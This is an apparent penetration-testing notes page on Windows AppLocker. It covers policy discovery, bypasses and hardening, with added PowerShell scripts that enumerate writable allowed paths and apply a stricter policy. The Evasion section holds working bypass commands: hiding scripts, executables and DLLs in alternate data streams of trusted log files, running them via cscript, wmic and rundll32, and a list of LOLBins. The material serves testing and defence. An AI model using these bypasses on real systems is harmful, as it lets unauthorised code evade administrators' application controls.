AppLocker

30.04.2024 · dadevel

AppLocker is a Windows feature that controls which executables, DLLs, scripts, Windows Installer packages and packaged apps a user can run. The default rules allow members of the local Administrators group to run everything, and local service accounts are usually not affected either, so in practice it restricts unprivileged users only.

Unlike WDAC, Microsoft does not consider AppLocker a security boundary: bypasses are treated as defense-in-depth issues and are not serviced as vulnerabilities. The default rule set is insecure and easily bypassed.

Discovery

When you try to run an executable that is blocked by AppLocker you get the following error: This program is blocked by group policy. For more information, contact your system administrator.

Show the effective AppLocker policy as an unprivileged user. Note the EnforcementMode of each rule collection: only Enabled blocks anything, AuditOnly merely logs and NotConfigured means the collection (e.g. DLLs) is not checked at all.

Get-ApplockerPolicy -Effective -Xml
Get-ApplockerPolicy -Effective | Select -ExpandProperty RuleCollections
Get-ChildItem 'HKLM:Software\Policies\Microsoft\Windows\SrpV2'

Retrieve AppLocker policies from GPOs with PowerView and Parse-PolFile from the GPRegistryPolicyParser module.

Get-DomainGPO -Domain corp.local | ?{ $_.DisplayName -ilike '*AppLocker*' } | Select DisplayName,GPCFileSyspath
cp \\dc01.corp.local\SysVol\corp.local\Policies\{7E1E1636-1A59-4C35-895B-3AEB1CA8CFC2}\Machine\Registry.pol .
Parse-PolFile .\Registry.pol

Evasion

The default AppLocker policy leaves the DLL rule collection unconfigured, so DLLs are never checked. An unprivileged user can therefore load arbitrary DLLs, e.g. with rundll32.exe, which is itself allowed because it lives under C:\Windows.

Furthermore, the default path rules allow everything under C:\Program Files, C:\Program Files (x86) and C:\Windows. C:\Windows contains several subdirectories that every user can write to. AppLocker is bypassed as soon as you can write into one of these allowed directories: drop the binary or script there and run it.

For each candidate directory check whether a group you belong to (Everyone, BUILTIN\Users, Authenticated Users) has write access (W, M or F) to drop the file, and read and execute rights (RX or F) to run it afterwards.

icacls.exe C:\Windows\Tasks
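The following script is an added example, not part of the original page, that automates the two checks above: it reads the effective policy, prints the enforcement mode of each rule collection and then probes every enforced, allowed path rule for directories the current user can write to. Run it as the unprivileged user you are assessing, since an admin token makes almost everything writable. The list of path variables and the depth of the directory walk are assumptions chosen for the default rule set.

```powershell
# Added example, not from the original page: parse the effective AppLocker
# policy, print the enforcement mode of every rule collection and then probe
# every enforced allow path rule for directories the current user can write to.
# Assumes NTFS and the built-in AppLocker PowerShell module.

$policy = [xml](Get-AppLockerPolicy -Effective -Xml)

# AppLocker path variables and the directories they expand to (assumed set).
# %PROGRAMFILES% matches both Program Files directories.
$pathVars = @{
    '%WINDIR%'       = @($env:windir)
    '%SYSTEM32%'     = @("$env:windir\System32")
    '%PROGRAMFILES%' = @(@($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ })
    '%OSDRIVE%'      = @($env:SystemDrive)
}

function Expand-AppLockerPath([string] $Path) {
    # Returns the real path(s) behind a rule path such as %WINDIR%\Temp\*.
    foreach ($var in $pathVars.Keys) {
        if ($Path.StartsWith($var, 'OrdinalIgnoreCase')) {
            $rest = $Path.Substring($var.Length)
            foreach ($root in $pathVars[$var]) { $root + $rest }
            return
        }
    }
    $Path   # %REMOVABLE%, %HOT% or a literal path: pass through unchanged
}

function Test-WritableDirectory([string] $Dir) {
    # ACLs are easy to misread; creating and deleting a probe file is definitive.
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

foreach ($collection in $policy.AppLockerPolicy.RuleCollection) {
    '{0,-8} EnforcementMode={1}' -f $collection.Type, $collection.EnforcementMode
}

foreach ($collection in $policy.AppLockerPolicy.RuleCollection) {
    # AuditOnly and NotConfigured collections block nothing, so skip them.
    if ($collection.EnforcementMode -ne 'Enabled') { continue }
    # Only path rules care where a file lives; publisher and hash rules do not.
    foreach ($rule in @($collection.FilePathRule | Where-Object { $_.Action -eq 'Allow' })) {
        # Rules scoped to Administrators do not help an unprivileged user.
        if ($rule.UserOrGroupSid -eq 'S-1-5-32-544') { continue }
        $exceptions = @($rule.Exceptions.FilePathCondition.Path |
            Where-Object { $_ } |
            ForEach-Object { Expand-AppLockerPath $_ } |
            ForEach-Object { $_.TrimEnd('*') })
        foreach ($cond in @($rule.Conditions.FilePathCondition.Path)) {
            if ($cond -notlike '*\*') { continue }   # single-file rule, nothing to enumerate
            foreach ($root in Expand-AppLockerPath $cond) {
                $base = $root.TrimEnd('*')
                if (-not (Test-Path -LiteralPath $base)) { continue }
                # Depth 3 still reaches e.g. System32\spool\drivers\color under %WINDIR%.
                $dirs = @(Get-Item -LiteralPath $base) +
                        @(Get-ChildItem -LiteralPath $base -Directory -Recurse -Depth 3 -ErrorAction SilentlyContinue)
                foreach ($dir in $dirs) {
                    $full = $dir.FullName.TrimEnd('\') + '\'
                    # Directories carved out by an exception are not allowed, skip them.
                    if ($exceptions | Where-Object { $full.StartsWith($_, 'OrdinalIgnoreCase') }) { continue }
                    if (Test-WritableDirectory $dir.FullName) {
                        '{0,-8} rule "{1}" allows writable {2}' -f $collection.Type, $rule.Name, $dir.FullName
                    }
                }
            }
        }
    }
}
```

Every directory the script reports is a place where a file you drop is both allowed by a path rule and not excluded by an exception; confirm the effective ACL with icacls.exe before relying on it, since a write probe succeeding in a directory does not prove that you may also overwrite files already there.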

Bypass AppLocker through a writable file in a "trusted location" by storing the payload in an NTFS Alternate Data Stream of that file. Path rules match on the host file's path, so the stream inherits its allow rule:

echo new ActiveXObject('WScript.Shell').Run('powershell.exe') > "C:\Program Files (x86)\App\Logfile.log:test.js"
cscript.exe "C:\Program Files (x86)\App\Logfile.log:test.js"
type .\malware.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:malware.exe"
wmic.exe process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:malware.exe"'
type .\malware.dll > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"
rundll32.exe "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
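The ADS trick only works once you have found a file in an allowed location that your user may modify. The following added PowerShell example, which is not from the original page, searches the Program Files roots for such files, plants a harmless script in an alternate data stream of the first hit and runs it through cscript.exe. The file it picks and the stream name test.js are illustrative; the host must be NTFS.

```powershell
# Added example, not from the original page: find files inside the default
# allowed locations that the current user can modify, then plant a script in
# an alternate data stream of the first hit. The payload is a harmless echo.

function Find-WritableFile {
    param([string[]] $Roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}))
    foreach ($root in @($Roots | Where-Object { $_ })) {
        Get-ChildItem -LiteralPath $root -File -Recurse -ErrorAction SilentlyContinue |
            ForEach-Object {
                try {
                    # Open for write without truncating: this succeeds only if we may
                    # modify the file, which is what adding a stream requires. Nothing is written.
                    $fs = [IO.File]::Open($_.FullName, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
                    $fs.Dispose()
                    $_.FullName
                } catch { }
            }
    }
}

function Add-AdsScript([string] $HostFile, [string] $StreamName, [string] $Body) {
    # Set-Content -Stream writes to HostFile:StreamName; the file's own content is untouched.
    Set-Content -LiteralPath $HostFile -Stream $StreamName -Value $Body
    # List every stream on the file; ':$DATA' is the regular content.
    Get-Item -LiteralPath $HostFile -Stream * | Select-Object Stream, Length
}

$target = Find-WritableFile | Select-Object -First 1
if (-not $target) { 'no writable file under Program Files'; return }
Add-AdsScript -HostFile $target -StreamName 'test.js' -Body "WScript.Echo('running from ' + WScript.ScriptFullName);"
# cscript.exe lives under %WINDIR% and is allowed by the default rules; the path it
# is given, host file plus stream, still matches the %PROGRAMFILES% path rule.
cscript.exe //nologo "$($target):test.js"
# Clean up: remove only the stream, not the host file.
Remove-Item -LiteralPath $target -Stream 'test.js'
```

The full recursive walk of both Program Files directories is slow; narrow $Roots to the application you are targeting once you know where writable log or cache files live. Leaving foreign streams behind is noisy, which is why the example removes the stream after use.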

More restrictive AppLocker policies can often be bypassed through LOLBins: binaries that live in an allowed location but load and execute attacker-controlled code, for example:

C:\Windows\Microsoft.NET\Framework64\*\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\*\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\*\Microsoft.Workflow.Compiler.exe
C:\Windows\Microsoft.NET\Framework64\*\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\*\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\*\addinprocess.exe
C:\Windows\Microsoft.NET\Framework64\*\addinprocess32.exe
C:\Windows\Microsoft.NET\Framework64\*\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\*\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\*\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\*\Microsoft.Workflow.Compiler.exe
C:\Windows\Microsoft.NET\Framework\*\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\*\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\*\addinprocess.exe
C:\Windows\Microsoft.NET\Framework\*\addinprocess32.exe
C:\Windows\Microsoft.NET\Framework\*\aspnet_compiler.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cscript.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\regsvr32.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\wscript.exe

If these are blocked too, look for abusable features in third-party applications or installed scripting runtimes such as Perl or Python. AppLocker's script rules only cover .ps1, .bat, .cmd, .vbs and .js files, so as long as the interpreter itself is allowed, its scripts are not inspected.

Configuration

Open secpol.msc as administrator and go to Application Control Policies > AppLocker. Right-click each of Executable Rules, Windows Installer Rules, Script Rules and Packaged app Rules and select Create Default Rules. Then right-click AppLocker, open Properties, tick Configured for all four rule collections, set each to Enforce rules and click OK.

Enable autostart for the Application Identity service (AppIDSvc); without it AppLocker enforces nothing. On recent Windows builds sc.exe and Set-Service may refuse to change its start type, so set it directly in the registry.

Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\AppIDSvc -Name Start -Type DWORD -Value 0x2 -Force
Start-Service AppIDSvc

Refresh group policy so the new rules take effect.

gpupdate.exe /force
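The same configuration can be scripted instead of clicked through secpol.msc. The following is an added example, not from the original page: it builds a policy with the same default path rules the GUI generates, but also enforces the Dll collection and carves the user-writable C:\Windows subdirectories out of the %WINDIR% rule, closing the two default-policy bypasses from the Evasion section. The exception list is an assumption covering the commonly writable directories; extend it with whatever the icacls check finds on the target. Packaged app rules are left unconfigured here. Run it as administrator.

```powershell
# Added example, not from the original page: apply a hardened AppLocker policy
# from PowerShell. Rule GUIDs are generated, the exception list is an assumption.

$sidEveryone = 'S-1-1-0'
$sidAdmins   = 'S-1-5-32-544'
# Assumed list of directories under C:\Windows that every user can write to.
$userWritableWinDirs = @('%WINDIR%\Tasks\*', '%WINDIR%\Temp\*', '%WINDIR%\tracing\*')

function New-PathRule([string] $Name, [string] $Path, [string] $Sid, [string[]] $Exceptions) {
    $ex = ''
    if ($Exceptions) {
        $conds = ($Exceptions | ForEach-Object { "<FilePathCondition Path=`"$_`" />" }) -join ''
        $ex = "<Exceptions>$conds</Exceptions>"
    }
    # Every rule needs a unique GUID id; the value itself is arbitrary.
    "<FilePathRule Id=`"$([guid]::NewGuid())`" Name=`"$Name`" Description=`"`" UserOrGroupSid=`"$Sid`" Action=`"Allow`">" +
    "<Conditions><FilePathCondition Path=`"$Path`" /></Conditions>$ex</FilePathRule>"
}

function New-RuleCollection([string] $Type, [string[]] $Rules) {
    "<RuleCollection Type=`"$Type`" EnforcementMode=`"Enabled`">$($Rules -join '')</RuleCollection>"
}

# The same three rules for executables, DLLs and scripts.
$standardRules = @(
    (New-PathRule 'Program Files' '%PROGRAMFILES%\*' $sidEveryone)
    (New-PathRule 'Windows minus user-writable directories' '%WINDIR%\*' $sidEveryone $userWritableWinDirs)
    (New-PathRule 'Administrators: everything' '*' $sidAdmins)
)
$msiRules = @(
    (New-PathRule 'Windows Installer cache' '%WINDIR%\Installer\*' $sidEveryone)
    (New-PathRule 'Administrators: everything' '*' $sidAdmins)
)

$xml = '<AppLockerPolicy Version="1">' +
    (New-RuleCollection 'Exe'    $standardRules) +
    (New-RuleCollection 'Dll'    $standardRules) +
    (New-RuleCollection 'Script' $standardRules) +
    (New-RuleCollection 'Msi'    $msiRules) +
    '</AppLockerPolicy>'

$policyFile = Join-Path $env:TEMP 'applocker-hardened.xml'
[xml]$xml | Out-Null                      # throws early if the XML is malformed
Set-Content -LiteralPath $policyFile -Value $xml -Encoding UTF8

# Dry run before enforcing: a probe binary in C:\Windows\Tasks must be denied
# for Everyone, while cmd.exe in System32 stays allowed.
$probe = "$env:windir\Tasks\probe.exe"
Copy-Item -LiteralPath "$env:windir\System32\cmd.exe" -Destination $probe
Test-AppLockerPolicy -XmlPolicy $policyFile -Path $probe, "$env:windir\System32\cmd.exe" -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule
Remove-Item -LiteralPath $probe

# Apply locally, make sure the Application Identity service runs, then refresh.
Set-AppLockerPolicy -XmlPolicy $policyFile
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\AppIDSvc -Name Start -Type DWord -Value 2 -Force
Start-Service AppIDSvc
gpupdate.exe /force
```

Enforcing the Dll collection checks every DLL load on the machine, which costs performance and breaks software that loads libraries from user-writable locations, so test it in AuditOnly mode first by changing the EnforcementMode attribute. Test-AppLockerPolicy is worth running against a list of real user paths before Set-AppLockerPolicy, because a policy that denies C:\Windows\System32\cmd.exe for Everyone is not recoverable without an administrator.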